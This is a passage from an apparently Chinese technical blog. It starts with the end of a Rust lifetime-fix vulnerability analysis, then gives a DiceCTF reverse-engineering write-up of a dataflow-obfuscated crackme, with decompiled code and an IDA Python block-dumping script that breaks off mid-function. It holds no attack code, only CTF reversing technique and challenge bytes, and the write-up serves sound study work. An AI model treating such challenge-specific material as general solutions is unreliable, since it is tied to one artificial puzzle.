+   pub struct RowIterator<'a>(*mut _CassIterator, PhantomData<&'a _Row>);

并且也增加了对应的一些接口函数等等

-   impl Drop for RowIterator {
+   impl Drop for RowIterator<'_> {
        fn drop(&mut self) {
            unsafe { cass_iterator_free(self.0) }
        }
    }
-   impl<'a> Iterator for &'a RowIterator {
-       type Item = Value;
+   impl LendingIterator for RowIterator<'_> {
+       type Item<'a> = Value<'a> where Self: 'a;

-       fn next(&mut self) -> Option<<Self as Iterator>::Item> {
+       fn next(&mut self) -> Option<<Self as LendingIterator>::Item<'_>> {
            unsafe {
            match cass_iterator_next(self.0) {
                cass_false => None,
                cass_true => Some(Value::build(cass_iterator_get_column(self.0))),
            }
        }
    }

在原先的实现中，RowIterator并没有生命周期，而从名字上我们也可得知，其最终可以获取_Row对象，其完美符合我们先前提及的模型，由Test1获取Test2对象的模型，所以对于这些类型，修复前很可能确实存在类似的问题。不过仔细研究后，大部分的Iterator对象以及其提供的接口之间，获取的数据并没有Row与ResultIterator这样的，来自同一段内存的关系，故这些修复猜测应该是针对同类型的漏洞进行提前的修补。

参考资料

https://kaisery.github.io/trpl-zh-cn/title-page.html

DiceCTF_Scrambled_up

2024-02-13T14:30:32.000Z

周末有空打了个比赛，成功的爆零了（实际上队友做得很快，我自己倒是一个都没做出来）。比赛结束之后感觉这个题目依然挺有意思的，试着研究了一下，这里记录一下这个题目的做题过程

本文首发于奇安信攻防社区 https://forum.butian.net/share/2770

Scrambled-up

题目感觉是一种新型的混淆模式，又可能是一种常见的某种程序分析或者动态执行的过程。我咨询了周围一些朋友，大家都只是觉得眼熟，很可惜不能找到它的真身
主办方最后给出了程序的源码，是经典的函数式编程。根据研究应该是某一种lisp的方言，感觉想要复现应该是很困难的了。。
这个文章前半段会讲一下大体的分析思路，如果只想看整体逻辑的话，可以跳到中间部分的程序架构介绍开始

初探程序

题目只有一个elf，当把程序运行起来后，可以看到其大部分的逻辑都很普通，除了那个mmap了超大内存的地址，以及两个奇怪的函数（这两个函数我已经重命名过）

signal(SIGSEGV, invalid_flag);
__printf_chk(1LL, "Enter the flag: ");
fflush(stream);
getline(&input_buffer, &n, qword_558958EEB680);
input_ptr = &input_buffer[strlen(input_buffer) - 1];
if ( *input_ptr == '\n' )
  *input_ptr = 0;
v10 = 1;
v11[0] = (__int64)input_buffer;
v11[1] = strlen(input_buffer);
off_558958EEB698 = (MyString *)v11;
addr = mmap(0LL, 0xF00000uLL, 3, 0x22, 0, 0LL);// PROT_READ|PROT_WRITE
inst_array = read_inst(inst_edge, inst_code); // PART I: init block and edge
parser_inst(lines_number, (__int64)inst_array);// PART II: execute

程序初始化 read_inst

这个read_inst中会从两个全局变量中读取数据。他这个读取过程会使用两个全局变量inst_edge和inst_code。在这里，程序会分别将这些数据读入，并且更新一个数组，这里为了方便描述，下文称为Block。以下是修改后的大致逻辑:

 // 首先会遍历所有的inst_code
do
{
    line = inst_code->line;
    inst_code = inst_code->next_call;
    if ( max_line < line )
    max_line = line;
}
while ( inst_code );
// 申请足够 max_line大的内存空间存放inst_code
blocks = malloc(max_line * sizeof(Block*))
do
{
    // 拷贝基本的block
    update_block(blocks, each_inst);
    // 注册两个重要概念：argv和slot
    blocks->argv = malloc(blocks->argv_cnt);
    blocks->slot = malloc(blocks->slot_cnt);
}
while ( each_inst_1 );

// 遍历所有的edge_inst，更新每一个Block的argv
foreach(each_edge in edge_inst)
{
    int src_block = each_edge->src;
    int dst_block = each_edge->dst;

    register_argv_slot(blocks[each_edge->dst]->slot, blocks[each_edge->src]->argv);

}

根据这里的逻辑，我们可以猜测如下的三个概念:

Inst：记录一个类似二进制在磁盘上存储的状态，表示当前的一些运行基本信息
Edge：记录了两个不同的二进制块之间的关联
Block：类似于加载到内存中的程序块

这三个结构体大致如下:

struct Inst
{
  Block *next_call;
  __int64 line;
  __int64 argc;
  __int64 slot_cnt;
  __int64 exec_type;
  Var var;
};

struct Edge
{
  Edge *next_cond;
  __int64 dst_line;
  __int64 src_line;
};

struct Block
{
  __int64 line;
  int exec_type;
  int field_C;
  __int64 argc;
  Var *argv;
  __int64 slot_cnt;
  Var *slot_buffer;
  Var value;
};

第一次看到这些结构体可能会难以理解，我们会在文章后面逐步介绍这些结构体是什么。除了这些关系外，我们可以观察到，不同的Block（Inst）会被Edge关联起来，其关系如下：



                                     +----------+
                                     |          |
                                     |  SRC1    |
                                     |          |
                     +-------+   +---+   BLOCK  |
                     |       |   |   |          |
                     |       |   |   |    argi1 |
                     |       |   |   +----------+
                     |     <-+---+
+-----------+        |       |       +----------+
|           |        |       |       |          |
|  DST      |        |       |       |  SRC3    |
|          <-+-------+       |       |          |
|   BLOCK   |        |     <-+-------+   BLOCK  |
|           |        |       |       |          |
|           |        |       |       |    argi2 |
+-----------+        |SLOT   |       +----------+
                     |       |
                     |       |       +----------+
                     |       |       |          |
                     |       |       |  SRC3    |
                     |       |       |          |
                     |     <-+-------+   BLOCK  |
                     |       |       |          |
                     |       |       |    argi3 |
                     |       |       +----------+
                     +-------+

可以看到，每一个DSTBlock中，会被多个SRCBlock注册。其中每一个SRC被注册的时候，会将对应的arg的地址放到DST中的slot中。每一个arg的序号不固定。

其次，我们可以注意到在Inst和Block末尾能看到一个叫做Var的变量:

struct Inst
{
  // ......
  Var var;
};

struct Block
{
  // ....;
  Var value;
};

每一个Block中可能包含一个有效的属性变量。这个属性的定义如下:

struct Var
{
  __int64 var_type;
  __int64 var_or_ptr;
  __int64 var_length;
};

成员变量解释如下:

var_type:当前变量的类型。1的时候表示当前var_or_ptr中存放的为指针，2的时候表示var_or_ptr中存放的是变量本身，0的时候表示当前值为无效值
var_or_ptr:当前变量的值
var_length:当type为1的时候，表示指针指向的内容长度

总结一下，初始化过程中会发生如下的流程：

读取磁盘中的Inst，将其放入Blocks数组中
读取磁盘中的Edge，将不同的Blocks的arg与另一些Blocks的slot关联

解析Block parser_inst

在执行流中，程序执行过程如下:

  new_lines = calloc(lines_number, 1uLL);
  has_been_exec = &new_lines;
  do
  {
    do
    {
      if ( !*has_been_exec )
      {
        if ( !iter_block->exec_type )           // exec_type = 0 means don't call any func
          goto just_execute;
        pointer_cnt = iter_block->argc;
        if ( !pointer_cnt )
        {
SelectCond:
          exec_inst(iter_block);
just_execute:
          *has_been_exec = 1;
          goto LABEL_5;
        }
        pointer_array = iter_block->argv;
        check_idx = 0LL;
        while ( LODWORD(pointer_array->var_type) )
        {
          ++check_idx;
          ++pointer_array;
          if ( check_idx == pointer_cnt )
            goto SelectCond;
        }
      }
LABEL_5:
      ++has_been_exec;
      ++iter_block;
    }
    while ( final_inst != has_been_exec );
    // skip code
}

整个程序流执行的时候，有如下的检测逻辑：

如果argc为0的话，进入exec_inst逻辑
如果argc不为0的时候，检查argv是否已经被完全初始化（不为空），如果彻底初始化，进入exec_inst逻辑
程序运行完成之后，会检查是否执行到最后一个块，如果执行到最后一个块，但是并未每一个块都执行过，程序将会直接退出

这里将会埋下程序执行流的第一个疑问：argv将会在哪儿被初始化？

执行部分 exec_inst

这个函数中，存放了11个不同的函数：

__int64 __fastcall exec_inst(NewInstr *a1)
{
  void *funcs[11]; // [rsp+0h] [rbp-78h] OVERLAPPED
  unsigned __int64 v3; // [rsp+68h] [rbp-10h]

  funcs[0] = 0LL;
  *(_OWORD *)&funcs[6] = 0LL;
  *(__m128i *)&funcs[1] = _mm_unpacklo_epi64(
                            (__m128i)(unsigned __int64)func1_sum_ptr,
                            (__m128i)(unsigned __int64)func2_multi);
  funcs[5] = func5_assing_if_else;
  *(__m128i *)&funcs[3] = _mm_unpacklo_epi64(
                            (__m128i)(unsigned __int64)func3_assign_valut_to_register,
                            (__m128i)(unsigned __int64)func4_call_func);
  *(__m128i *)&funcs[8] = _mm_unpacklo_epi64(
                            (__m128i)(unsigned __int64)find_flag,
                            (__m128i)(unsigned __int64)func9_send_read_string);
  *(__m128i *)&funcs[10] = _mm_unpacklo_epi64(
                             (__m128i)(unsigned __int64)func10_combine_two_pointer,
                             (__m128i)(unsigned __int64)funcb_get_value_frm_ptr_offset);
  return ((__int64 (*)(void))funcs[a1->exec_type])();
}

程序会通过将9个不同的函数放到栈上，并且根据Block中的exec_type指定我们需要执行的函数类型。我们在这里将这些函数定义为ExecFunc。这里总结一下不同的type对应的函数功能

type	函数作用
1	将所有的argv相加，将答案赋值
2	将所有的argv相乘，将答案赋值
3	将var位置的block赋值
4	调用一个函数指针，并且将调用结果赋值
5	如果argv[0] == 0,则使用argv[1]赋值，否则使用argv[2]赋值
8	检查flag是否正确
9	调用read函数，将flag读入全局变量中
10	将两个指针指向的内存合并到一个新的内存中
11	获取argv[0][argv[1]]的值，并且赋值

这里可以看到，反复提到了一个叫做赋值的操作。这个操作具体在做什么呢？我们选择其中最简单的类型3assgin为例子看一下:

void __fastcall assign(NewInstr *a1)
  v1 = _mm_loadu_si128((const __m128i *)&a1->value);
  var_length = a1->value.var_length;
  var_cnt = a1->slot_cnt;
  if ( var_cnt )
  {
    var_array = a1->slot_buffer;
    end_var = (Var *)((char *)var_array + 8 * var_cnt);
    do
    {
      each_var_obj = (Var *)var_array->var_type;
      var_array = (Var *)((char *)var_array + 8);
      each_var_obj->var_length = var_length;
      *(__m128i *)&each_var_obj->var_type = v1;
    }
    while ( var_array != end_var );
  }

这边可以看到，程序在运行过程中，会将slot中存放的内容作为指针取出，并且将从var中取出的数值赋值到指针中。这个就是前文提到的赋值概念。更加形象化的描述的话，这个赋值过程如下：

程序进入exec_inst，执行block指定的一个函数
此时，取出block中所有的argv（在之前我们限制了argv一定要都处于被初始化的状态，而且类似assign过程是不需要参数的）
执行操作，获得一个计算结果
从当前block的slot中取出所有的指针，并且进行赋值

for(int i; i < block->slot_cnt;i++ )
{
  ptr = block->slot[i];
  *ptr = ret_value;
}

至此，我们可以知道当前Block的几个特征

程序在运行过程中，一个Block的输出会影响其他Block的输入
Block通常会拥有多个参数，但是所有的参数都要其他的Block作为输出赋值，除非当前Block的call_type为3，此时block不拥有参数，只会有赋值动作
Block的输入参数不会被修改，单个Block类似于pure function

exec_type 4 – 新的关键函数

程序在运行的时候，会发现这个exec_type:4还蛮关键的，看到其函数如下:


mprotect(addr, 0xF00000uLL, 3);
memcpy(addr, (const void *)a1->argv->var_or_ptr, a1->argv->var_length);
mprotect(addr, 0xF00000uLL, 5);
memset(v17, 0, 0x188uLL);
argc = a1->argc;
v17[0] = argc - 1;
if ( argc > 1 )
  memcpy(&v17[1], &a1->argv[1], 24 * argc - 0x18);
v2 = _mm_loadu_si128((const __m128i *)g_flag);
funcs = _mm_load_si128(v13);
v11 = funcs;
qmemcpy(v10, v17, sizeof(v10));
((void (__fastcall *)(char *))addr)(v18);     // reorg_buffer(pointer1, pointer2)
fflush(stream);
// skip code

可以看到，这边会将argv[0]作为输入，拷贝到全局变量addr中，然后将其他的argv作为参数传入到这个函数指针中。然而在逆向过程中会发现，代码中的数据段并没有任何地方存放了一个完整的函数。通过一些逆向我们能够知道，函数们似乎在最初都被加密了，所以只得让程序运行一段再回头看。这里给出call_type：4会执行的函数，为了与上文的ExecFunc区分，这里我们定义他们为CallFunc（函数名为我们自定义的）。

函数名	作用
xor_all_argv	将所有的参数异或
or_all_argv	将所有的参数或
and_all_argv	将所有的参数相与
check_if_zero	检查第二个参数是否为0，如果为0返回1，否则返回0
get_index_from_input	获取输入的第index参数，此时输入会传入该函数中
reorder	将输入（16字节）按照指定的顺序重构
maze_step	走迷宫函数，最后介绍

到这一步，基本上所有静态分析（其实也使用了动态了）能做的就都做完了，接下需要对程序进行一个宏观审视，才能进一步的分析整个逻辑。

程序架构介绍

分析了上面的执行流之后，我们发现这个程序的执行过程和传统程序不一样，甚至和传统意义上被混淆的程序有所不同。

传统意义上，我们的程序使用了是带有分支的执行流，例如:

if(a > 0)
{
  while(TRUE){
    a += 6;
    if(b-a < 0x100){
      break;
    }
  }
}
else{
  // code
}

从程序上来看，if..else..是两个完全不相关的逻辑，这就意味这程序本身是以执行流作为指导，比如说：

程序会因为传入的数据变化进入不同的分支，并非所有的逻辑都会被触发
程序执行的过程中，可能同一个变量会持续地被修改
程序地条件语句执行变化非常的丰富

即使是进行混淆（例如ollvm的扁平化），本质是基于执行流，即通过增加状态值，让程序跳转到不同的执行块上。这种编程方式我们临时性的定义为执行流编程

然而根据前面分析我们可以知道，本题有以下几个特征

程序运行为简单的线性，所有的逻辑都会被执行一遍
程序执行过程中，只有输入变量和输出变量，并且输入变量恒定不变。当程序有需要修改输入变量指向的位置地时候，会将输入变量本身输出到另一个代码块，然后再执行
程序条件判断很简单，只有判断0和非0两种情况

根据搜索，这种被称之为数据流编程（Dataflow programming）也就是使用数据流作为串联整个程序地核心。

将这两个对比可以得到如下地结果

执行流编程	数据流编程
根据输入情况，并非所有逻辑都会执行（不考虑exit等系统调用）	无论输入如何变化，所有逻辑都会被执行（不考虑exit等系统调用）
程序中的单一变量可能被修改	存在输入和输出变量，输入变量一定不能被修改
条件语句较为丰富	条件判断单一

题目分析

题目初步分析

这里对比以后，我们会发现这个题目存在以下难题：

我们不能像以前一样简单的模拟程序，从而还原当前程序。常见地去混淆之类的技巧就是通过模拟运行（或者真实运行）重组当前执行流，然而当前程序执行流均被展开。比如说for循环中的i在这个数据流中完全被展开了，不存在形如（BlockA -> BlockB -> BlockA）这种执行顺序。因此循环和判断语句需要完全凭借经验进行转换。
即使尝试进行执行流还原，粒度也会非常细。每一个BlockA最多只会执行一个简单的函数（除了maze_step）这样一来我们就很难像常见的逆向题一样，根据一些特定的特征函数对数据进行还原。
程序的变量传递是随着程序进行的。不同于执行流，这个数据流程序的变量一直都是持续的传递和组合，而传统的执行流程序很多时候并非真的需要完全解密（除了某些SMC程序）往往找到条件判断|加密这两部分逻辑，再在关键位置进行dump，就能够还原原先的逻辑。即便是类VM的程序，也能够根据对应的VM所指令，将指定的变量按照对应寄存器之类的处理还原，最后能够还原出整体逻辑。然而当前程序本身粒度非常细，并且变量传递非常频繁，这就需要人为主动的根据逻辑分析哪些变量是无需考虑，哪些变量需要我们持续追踪。

分析了上述难点后，我们发现，想要解出这道题，需要满足如下需求：

尽可能地打印原始的数据流块，并且需要还原变量传递的关系。虽然粒度非常细，但是通过审计和猜测，可以得到部分数据块之间的关系。
在尽可能程序运行结尾处进行内存dump等工作，这样能保证所有变量已经完成了传递。这种数据流虽然缺失了执行跳转，但是从另一个角度说，在结尾处，所有的逻辑都会被执行。这就意味着即便是输入出错，我们也能获取完整的逻辑。
每一个Block都有多个参数，参数的赋值顺序来自于其在Edge中注册的顺序，越早注册的argv下标越大，需要结合edge弄明白变量来自于哪个block。

阶段一：数据流dump

为了尽可能的获取数据，我们可以在ExecFunc8，也就是确认flag是否正确的函数处下断点，当程序能够运行到当前位置的时候，说明所有的Block解密部分以及数据传递已经完成。

此时，内存中的数据如图：

此即为Block所在的堆。于是此时我们可以尝试dump完整的运行中Block数据。根据当前的偏移，计算起始坐标：

1	0x7FABE02BC0D8(current_addr) - 0x48(sizeof(Block1))*0x1191(line)

同时，我们找到edge对应的位置：

此时，我们找到了关键的Block和对应的关联Edge。编写脚本，将所有的执行流dump下来:

import idc
import idaapi
import os

CONTENT_TYPE_CGI = 1
CONTENT_TYPE_BIN = 8

def create_dir(path):
    if not os.path.exists(path):
        os.makedirs(path)

func_map = {
    b'UH\x89\xe5H\x81\xec\xd0\x03\x00\x00H\x89\xbd8\xfc\xff\xff\x8bE\x18\x83\xf8\x02\x0f\x85\x91\x00\x00\x00H\xc7E\xf8\x00\x00\x00\x00H\xc7E\xf0\x00\x00\x00\x00\xeb(H\x8bU\xf0H\x89\xd0H\x01\xc0H\x01\xd0H\xc1\xe0\x03H\x8d@\x10H\x01\xe8H\x83\xc0\x10H\x8b\x00H1E\xf8H\x83E\xf0\x01H\x8bE\x10H9E\xf0r\xceH\x8b\x858\xfc\xff\xffH\x89\xc6\xb8\x00\x00\x00\x00\xba1\x00\x00\x00H\x89\xf7H\x89\xd1\xf3H\xabH\x8b\x858\xfc\xff\xffH\xc7\x00\x01\x00\x00\x00H\x8b\x858\xfc\xff\xff\xc7@\x08\x02\x00\x00\x00H\x8b\x858\xfc\xff\xffH\x8bU\xf8H\x89P\x10\xe9\xfc\x00\x00\x00H\x8bE H\x8bU(H\x89E\xc0H\x89U\xc8H\x8bE8H\x8bU@H\x89E\xb0H\x89U\xb8H\x8bE\xc8H\x89E\xe0H\x8bE\xb8H\x89E\xd8H\x8bU\xd8H\x8bE\xe0H9\xc2H\x0fC\xc2H\x89E\xd0H\x8b\x95\x98\x01\x00\x00H\x8bE\xd0H\x89\xc7\xff\xd2H\x89E\xa0H\x8bE\xd0H\x89E\xa8H\xc7E\xe8\x00\x00\x00\x00\xeb2H\x8bU\xc0H\x8bE\xe8H\x01\xd0\x0f\xb60H\x8bU\xb0H\x8bE\xe8H\x01\xd0\x0f\xb6\x08H\x8bU\xa0H\x8bE\xe8H\x01\xd01\xce\x89\xf2\x88\x10H\x83E\xe8\x01H\x8bE\xe8H;E\xd0r\xc4L\x8bE\xa0H\x8b\x858\xfc\xff\xffH\x89\xc6\xb8\x00\x00\x00\x00\xba1\x00\x00\x00H\x89\xf7H\x89\xd1\xf3H\xabH\x8b\x858\xfc\xff\xffH\xc7\x00\x01\x00\x00\x00H\x8b\x858\xfc\xff\xff\xc7@\x08\x01\x00\x00\x00H\x8b\x858\xfc\xff\xffL\x89@\x10H\x8b\x858\xfc\xff\xffH\x8bU\xd0H\x89P\x18H\x8b\x858\xfc\xff\xff\xc9\xc3\x00':"xor_all_argv",
    b'UH\x89\xe5H\x81\xecH\x01\x00\x00H\x89\xbdH\xfe\xff\xffH\x8d\x95p\xfe\xff\xff\xb8\x00\x00\x00\x00\xb91\x00\x00\x00H\x89\xd7\xf3H\xabH\x8bE\x10H\x89\x85p\xfe\xff\xffH\xc7E\xf8\x00\x00\x00\x00\xe9\x91\x00\x00\x00H\x8bU\xf8H\x89\xd0H\x01\xc0H\x01\xd0H\xc1\xe0\x03H\x8d@\x10H\x01\xe8H\x83\xc0\x10H\x8b\x00H\x85\xc0\x0f\x94\xc0\x0f\xb6\xc8H\x8bU\xf8H\x89\xd0H\x01\xc0H\x01\xd0H\xc1\xe0\x03H\x01\xe8H-\x90\x01\x00\x00f\x0f\xef\xc0\x0f\x11@\x08f\x0f\xd6@\x18H\x8bU\xf8H\x89\xd0H\x01\xc0H\x01\xd0H\xc1\xe0\x03H\x01\xe8H-\x88\x01\x00\x00\xc7\x00\x02\x00\x00\x00H\x8bU\xf8H\x89\xd0H\x01\xc0H\x01\xd0H\xc1\xe0\x03H\x01\xe8H-\x80\x01\x00\x00H\x89\x08H\x83E\xf8\x01H\x8bE\x10H9E\xf8\x0f\x82a\xff\xff\xffH\x8b\x85H\xfe\xff\xffH\x89\xc7H\x8d\x85p\xfe\xff\xff\xba1\x00\x00\x00H\x89\xc6H\x89\xd1\xf3H\xa5H\x8b\x85H\xfe\xff\xff\xc9\xc3\x00':"check_if_zero",
    b'UH\x89\xe5H\x81\xecX\x01\x00\x00H\x89\xbd8\xfe\xff\xffH\xc7E\xf8\xff\xff\xff\xffH\xc7E\xf0\x00\x00\x00\x00\xeb(H\x8bU\xf0H\x89\xd0H\x01\xc0H\x01\xd0H\xc1\xe0\x03H\x8d@\x10H\x01\xe8H\x83\xc0\x10H\x8b\x00H!E\xf8H\x83E\xf0\x01H\x8bE\x10H9E\xf0r\xceH\x8b\x858\xfe\xff\xffH\x89\xc6\xb8\x00\x00\x00\x00\xba1\x00\x00\x00H\x89\xf7H\x89\xd1\xf3H\xabH\x8b\x858\xfe\xff\xffH\xc7\x00\x01\x00\x00\x00H\x8b\x858\xfe\xff\xff\xc7@\x08\x02\x00\x00\x00H\x8b\x858\xfe\xff\xffH\x8bU\xf8H\x89P\x10H\x8b\x858\xfe\xff\xff\xc9\xc3\x00':"and_all_argv",
    b'UH\x89\xe5H\x81\xec\xd0\x03\x00\x00H\x89\xbd8\xfc\xff\xffH\x8bE H\x89E\xf8H\x83}\xf8\x00utH\x8b\x85\x98\x01\x00\x00\xbf\x0c@\x00\x00\xff\xd0H\x89E\xe0H\x8bE\xe0\xc7\x00@\x00\x00\x00H\x8bE\xe0\xc7@\x04@\x00\x00\x00L\x8bE\xe0H\x8b\x858\xfc\xff\xffH\x89\xc6\xb8\x00\x00\x00\x00\xba1\x00\x00\x00H\x89\xf7H\x89\xd1\xf3H\xabH\x8b\x858\xfc\xff\xffH\xc7\x00\x01\x00\x00\x00H\x8b\x858\xfc\xff\xff\xc7@\x08\x02\x00\x00\x00H\x8b\x858\xfc\xff\xffL\x89@\x10\xe9\x9d\x02\x00\x00H\x8bE8H\x89E\xd8H\x8bE\xd8H\x83\xf8\x0cutH\x8bE\xf8\x0f\xb6@\x08\x84\xc0t\x08A\xb8\x00\x00\x00\x00\xeb\x17H\x8bE\xf8\x8b\x00\xc1\xe0\x10\x89\xc2H\x8bE\xf8\x8b@\x04\t\xd0A\x89\xc0H\x8b\x858\xfc\xff\xffH\x89\xc6\xb8\x00\x00\x00\x00\xba1\x00\x00\x00H\x89\xf7H\x89\xd1\xf3H\xabH\x8b\x858\xfc\xff\xffH\xc7\x00\x01\x00\x00\x00H\x8b\x858\xfc\xff\xff\xc7@\x08\x02\x00\x00\x00H\x8b\x858\xfc\xff\xffL\x89@\x10\xe9\x17\x02\x00\x00H\x8bE\xd8H\x83\xf8\nt\nH\x8bE\xd8H\x83\xf8\x0buzH\x8bEPH\x89E\xf0H\x8bEhH\x89E\xe8H\x8bE\xf8H\x8bU\xf0H\xc1\xe2\x07H\x01\xc2H\x8bE\xe8H\x01\xd0H\x83\xc0\t\xc6\x00\xffL\x8bE\xf8H\x8b\x858\xfc\xff\xffH\x89\xc6\xb8\x00\x00\x00\x00\xba1\x00\x00\x00H\x89\xf7H\x89\xd1\xf3H\xabH\x8b\x858\xfc\xff\xffH\xc7\x00\x01\x00\x00\x00H\x8b\x858\xfc\xff\xff\xc7@\x08\x02\x00\x00\x00H\x8b\x858\xfc\xff\xffL\x89@\x10\xe9\x89\x01\x00\x00H\x8bE\xd8H\x85\xc0u H\x8bE\xf8\x8b\x00\x8dP\x01H\x8bE\xf8\x89\x10H\x8bE\xf8\x8b@\x04\x8dP\x01H\x8bE\xf8\x89P\x04H\x8bE\xd8H\x83\xf8\x01u\x11H\x8bE\xf8\x8b@\x04\x8dP\x01H\x8bE\xf8\x89P\x04H\x8bE\xd8H\x83\xf8\x02u H\x8bE\xf8\x8b\x00\x8dP\xffH\x8bE\xf8\x89\x10H\x8bE\xf8\x8b@\x04\x8dP\x01H\x8bE\xf8\x89P\x04H\x8bE\xd8H\x83\xf8\x03u\x0fH\x8bE\xf8\x8b\x00\x8dP\xffH\x8bE\xf8\x89\x10H\x8bE\xd8H\x83\xf8\x04u\x0fH\x8bE\xf8\x8b\x00\x8dP\x01H\x8bE\xf8\x89\x10H\x8bE\xd8H\x83\xf8\x05u H\x8bE\xf8\x8b\x00\x8dP\x01H\x8bE\xf8\x89\x10H\x8bE\xf8\x8b@\x04\x8dP\xffH\x8bE\xf8\x89P\x04H\x8bE\xd8H\x83\xf8\x06u\x11H\x8bE\xf8\x8b@\x04\x8dP\xffH\x8bE\xf8\x89P\x04H\x8bE\xd8H\x83\xf8\x07u H\x8bE\xf8\x8b\x00\x8dP\xffH\x8bE\xf8\x89\x10H\x8bE\xf8\x8b@\x04\x8dP\xffH\x8bE\xf8\x89P\x04H\x8bE\xf8\x8b\x10H\x8bE\xf8\x8bH\x04H\x8bE\xf8\x89\xc9\x89\xd2H\xc1\xe2\x07H\x01\xd0H\x01\xc8H\x83\xc0\t\x0f\xb6\x00\x84\xc0t\x08H\x8bE\xf8\xc6@\x08\x01L\x8bE\xf8H\x8b\x858\xfc\xff\xffH\x89\xc6\xb8\x00\x00\x00\x00\xba1\x00\x00\x00H\x89\xf7H\x89\xd1\xf3H\xabH\x8b\x858\xfc\xff\xffH\xc7\x00\x01\x00\x00\x00H\x8b\x858\xfc\xff\xff\xc7@\x08\x02\x00\x00\x00H\x8b\x858\xfc\xff\xffL\x89@\x10H\x8b\x858\xfc\xff\xff\xc9\xc3\x00':"maze_step",
    b'UH\x89\xe5H\x81\xecH\x01\x00\x00H\x89\xbdH\xfe\xff\xffH\x8d\x95p\xfe\xff\xff\xb8\x00\x00\x00\x00\xb91\x00\x00\x00H\x89\xd7\xf3H\xabH\xc7\x85p\xfe\xff\xff\x01\x00\x00\x00\xc7\x85x\xfe\xff\xff\x02\x00\x00\x00H\x8bU H\x8b\x85\xb0\x01\x00\x00H9\xc2s\x16H\x8b\x95\xa8\x01\x00\x00H\x8bE H\x01\xd0\x0f\xb6\x00\x0f\xb6\xc0\xeb\x05\xb8\x00\x00\x00\x00H\x89\x85\x80\xfe\xff\xffH\x8b\x85H\xfe\xff\xffH\x89\xc7H\x8d\x85p\xfe\xff\xff\xba1\x00\x00\x00H\x89\xc6H\x89\xd1\xf3H\xa5H\x8b\x85H\xfe\xff\xff\xc9\xc3\x00':"get_index_from_input",
    b'UH\x89\xe5H\x81\xecp\x02\x00\x00H\x89\xbd\x98\xfd\xff\xffH\xb8\x0f\r\x07\x08\x05\x03\x06\x04H\xba\x0e\x00\x02\x0b\t\x0c\n\x01H\x89\x85`\xff\xff\xffH\x89\x95h\xff\xff\xff\xc6E\xff\x00\xeb0H\x8bU8\x0f\xb6E\xffH\x01\xd0\x0f\xb6\x00\x83\xf0N\x0f\xb6\xc0\x0f\xb6M\xffH\x98\x0f\xb6\x94\x05`\xff\xff\xffHc\xc1\x88\x94\x05P\xff\xff\xff\x80E\xff\x01\x80}\xff\x0fv\xcaH\x8bE H\x89\x85p\xff\xff\xffH\x8b\x85p\xff\xff\xff\xf3\x0fo\x00\x0f)E\xe0H\x8d\x85P\xff\xff\xffH\x89\x85x\xff\xff\xffH\x8b\x85x\xff\xff\xff\xf3\x0fo\x00\x0f)E\xd0f\x0foE\xe0\x0f)E\x90f\x0foE\xd0\x0f)E\x80f\x0foM\x80f\x0foE\x90f\x0f8\x00\xc1\x0f)E\xc0H\x8b\x85\x98\x01\x00\x00\xbf\x10\x00\x00\x00\xff\xd0H\x89E\xb8H\x8bE\xb8H\x89E\xb0f\x0foE\xc0\x0f)E\xa0f\x0foE\xa0H\x8bE\xb0\x0f\x11\x00\x90H\x8b\x85\x98\xfd\xff\xffH\x89\xc6\xb8\x00\x00\x00\x00\xba1\x00\x00\x00H\x89\xf7H\x89\xd1\xf3H\xabH\x8b\x85\x98\xfd\xff\xffH\xc7\x00\x01\x00\x00\x00H\x8b\x85\x98\xfd\xff\xff\xc7@\x08\x01\x00\x00\x00H\x8b\x85\x98\xfd\xff\xffH\x8bU\xb8H\x89P\x10H\x8b\x85\x98\xfd\xff\xffH\xc7@\x18\x10\x00\x00\x00H\x8b\x85\x98\xfd\xff\xff\xc9\xc3\x00':"reorder",
    b'UH\x89\xe5H\x81\xecX\x01\x00\x00H\x89\xbd8\xfe\xff\xffH\xc7E\xf8\x00\x00\x00\x00H\xc7E\xf0\x00\x00\x00\x00\xeb(H\x8bU\xf0H\x89\xd0H\x01\xc0H\x01\xd0H\xc1\xe0\x03H\x8d@\x10H\x01\xe8H\x83\xc0\x10H\x8b\x00H\tE\xf8H\x83E\xf0\x01H\x8bE\x10H9E\xf0r\xceH\x8b\x858\xfe\xff\xffH\x89\xc6\xb8\x00\x00\x00\x00\xba1\x00\x00\x00H\x89\xf7H\x89\xd1\xf3H\xabH\x8b\x858\xfe\xff\xffH\xc7\x00\x01\x00\x00\x00H\x8b\x858\xfe\xff\xff\xc7@\x08\x02\x00\x00\x00H\x8b\x858\xfe\xff\xffH\x8bU\xf8H\x89P\x10H\x8b\x858\xfe\xff\xff\xc9\xc3\x00':"or_all_argv"
}


def parse_var(var_address,var_cnt):
    struct_array = []
    current_address = var_address
    cnt = 0

    while True:
        
        # addr = current_address
        var_type = idaapi.get_qword(current_address)
        var_or_ptr = idaapi.get_qword(current_address + 8)
        var_length = idaapi.get_qword(current_address + 0x10)
        cnt += 1
        if cnt > var_cnt:
            break
        struct = {
            'value_type':var_type,
            'value_or_ptr':var_or_ptr,
            'var_length':var_length
        }
        struct_array.append(struct)

        # 更新当前地址
        current_address += 0x18

    return struct_array


def parse_route(start_address):
    struct_array = []
    current_address = start_address
    cnt = 0

    while True:
        cnt += 1
        # addr = current_address
        line = idaapi.get_qword(current_address)
        exec_type = idaapi.get_dword(current_address + 4)
        field_C = idaapi.get_dword(current_address + 8)
        pointer_cnt = idaapi.get_qword(current_address + 0x10)
        pointer_array = idaapi.get_qword(current_address + 0x18)
        var_cnt = idaapi.get_qword(current_address + 0x20)
        var_buffer = idaapi.get_qword(current_address + 0x28)
        value_type = idaapi.get_qword(current_address + 0x30)
        value_or_ptr = idaapi.get_qword(current_address + 0x38)
        var_length = idaapi.get_qword(current_address + 0x40)
        # router_name = idaapi.get_dword(current_address + 12)
        
        if cnt > 0x149d:
            break
        # if length == 0:
        #     break
        argv = parse_var(pointer_array,pointer_cnt)
        struct = {
            'current_addr':current_address,
            'line': line,
            'reserve': exec_type,
            'exec_type': field_C,
            'argc': pointer_cnt,
            'argv':argv,
            'slot_cnt':var_cnt,
            'slot_buf':var_buffer,
            'value_type':value_type,
            'value_or_ptr':value_or_ptr,
            'var_length':var_length
            # 'router_name': router_name
        }
        struct_array.append(struct)

        # 更新当前地址
        current_address += 0x48

    return struct_array


def parse_Block(start_address):
    struct_array = []
    current_address = start_address
    cnt = 0

    while True:
        cnt += 1
        # addr = current_address
        nextBlock = idaapi.get_qword(current_address)
        line = idaapi.get_dword(current_address + 8)
        argc = idaapi.get_qword(current_address + 0x10)
